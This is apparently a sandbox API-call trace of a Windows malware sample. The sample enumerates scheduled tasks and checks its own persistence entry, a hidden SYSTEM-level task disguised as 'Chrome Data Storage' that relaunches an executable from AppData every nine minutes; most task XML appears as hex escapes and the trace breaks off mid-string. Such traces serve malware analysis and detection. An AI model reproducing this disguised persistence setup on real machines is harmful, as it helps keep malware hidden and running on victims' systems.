	[0073.496] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0.0</Version>\r\n    <Author>AuthorName</Author>\r\n    <Description>Chrome Data Storage</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT9M</Interval>\r\n        <Duration>P415DT14H23M</Duration>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2019-05-14T15:31:33</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n      <UserId>SYSTEM</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="SYSTEM") returned="SYSTEM</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>"
	[0073.496] IUnknown:Release (This=0x552388) returned 0x0
	[0073.496] IRegisteredTaskCollection:get_Item (in: This=0x552948, index=0x12907c*(varType=0x3, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x2, varVal2=0x76a63ea3), ppRegisteredTask=0x129180 | out: ppRegisteredTask=0x129180*=0x552388) returned 0x0
	[0073.496] IRegisteredTask:get_Name (in: This=0x552388, pName=0x129184 | out: pName=0x129184*="GoogleUpdateTaskMachineCore") returned 0x0
	[0073.496] IRegisteredTask:get_Xml (in: This=0x552388, pXml=0x12918c | out: pXml=0x12918c*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x37\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0
	[0073.497] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x31\x30\x2d\x31\x39\x54\x31\x33\x3a\x31\x36\x3a\x30\x37\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.498] IUnknown:Release (This=0x552388) returned 0x0
	[0073.498] IRegisteredTaskCollection:get_Item (in: This=0x552948, index=0x12907c*(varType=0x3, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x3, varVal2=0x76a63ea3), ppRegisteredTask=0x129180 | out: ppRegisteredTask=0x129180*=0x552388) returned 0x0
	[0073.498] IRegisteredTask:get_Name (in: This=0x552388, pName=0x129184 | out: pName=0x129184*="GoogleUpdateTaskMachineUA") returned 0x0
	[0073.498] IRegisteredTask:get_Xml (in: This=0x552388, pXml=0x12918c | out: pXml=0x12918c*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x